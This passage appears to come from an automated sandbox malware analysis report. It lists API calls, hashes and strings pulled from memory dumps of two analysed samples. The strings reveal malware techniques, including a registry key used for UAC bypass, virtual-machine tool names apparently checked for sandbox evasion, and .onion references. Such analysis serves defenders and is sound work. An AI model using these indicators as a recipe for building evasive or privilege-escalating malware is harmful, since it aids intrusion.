                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 009046C4
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 009046CB
                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 009046D8
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00904707
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 377395780-0
                                                                                                                                                                                                                                                              • Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00624A44,00000000,?,0041D758,00000000,?,00000000,00000000,?,00624B08,00000000), ref: 00904727
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0090472E
                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00904741
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0090477B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3317088062-0
                                                                                                                                                                                                                                                              • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction ID: 8b90dbba440bf85468cc069a633efd3669ba731577f88e7a7be07616b4074d71
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF067B0A047289FDB309B60DD49BA9737ABB04311F0002D5EA1AE3290DB745E858F83
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 009039F1
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00903A0F
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00903A20
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 00903A2B
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 00903A41
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00903A49
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Pi@
                                                                                                                                                                                                                                                              • API String ID: 0-1360946908
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: SystemTimelstrcpy
                                                                                                                                                                                                                                                              • String ID: #F@$#F@
                                                                                                                                                                                                                                                              • API String ID: 62757014-661595268
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00905257: malloc.MSVCRT ref: 0090525F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FB6B4
                                                                                                                                                                                                                                                                • Part of subcall function 00905797: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009057B9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DB40), ref: 008FB6E2
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FB7BA
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FB7CE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2910778473-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00902C21
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D888), ref: 00902C3E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624DC4), ref: 00902C52
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D88C), ref: 00902C64
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: wsprintfA.USER32 ref: 009027F0
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: FindFirstFileA.KERNEL32(?,?), ref: 00902807
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: StrCmpCA.SHLWAPI(?,0041D864), ref: 00902835
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: StrCmpCA.SHLWAPI(?,0041D868), ref: 0090284B
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: FindNextFileA.KERNEL32(000000FF,?), ref: 00902A20
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: FindClose.KERNEL32(000000FF), ref: 00902A35
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2667927680-0
                                                                                                                                                                                                                                                              • Opcode ID: 5d2293bb92b353d421a5094c8b8f6ff56762a29023f594da7c4d3e6856184f9a
                                                                                                                                                                                                                                                              • Instruction ID: cf60760189792418c6c5305c9f28733ef5528af5e9f131b409e65c520911895b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d2293bb92b353d421a5094c8b8f6ff56762a29023f594da7c4d3e6856184f9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F2187B6900608ABDB24FBA0DD46EEA733DAF94740F000585B75A961C0EE74A6C58FA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1206339513-0
                                                                                                                                                                                                                                                              • Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction ID: 2cd13de9e29a1ad83fb2e4cd66c22fc22dd879e922ac010eb7d8913290e67e3f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA015E75510508FFCB14DFA8D944EAE7B79FF48344F108548F90A9B340CA71AA40DF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 012027EE
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0120280E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, Offset: 01202000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_1202000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: 09fb8b58e70f23d8b8093d412b431e12d436b7432d8a2caee8f0ad53bd1acfac
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93F0C235210312ABE7213BB8AC8CB6E76ECBF48625F10032AF742910C2DB70E9454661
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 13 1202485-12024bf call 1202798 16 12024c1-12024f4 VirtualAlloc call 1202512 13->16 17 120250d 13->17 19 12024f9-120250b 16->19 17->17 19->17
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 012024D6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, Offset: 01202000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_1202000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction ID: e47b7bcf3b930dc08435c5b2bd2bb53539075579f920c6b56eb1891e965fffff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C112D79A00208EFDB01DF98C985E99BFF5AF08350F058095F9489B362D371EA50DB84
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                                                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000840000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000C77000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CCF000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CD3000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CEF000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CF6000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected 
renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                                                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                                                                                                                              • Opcode ID: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                                                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
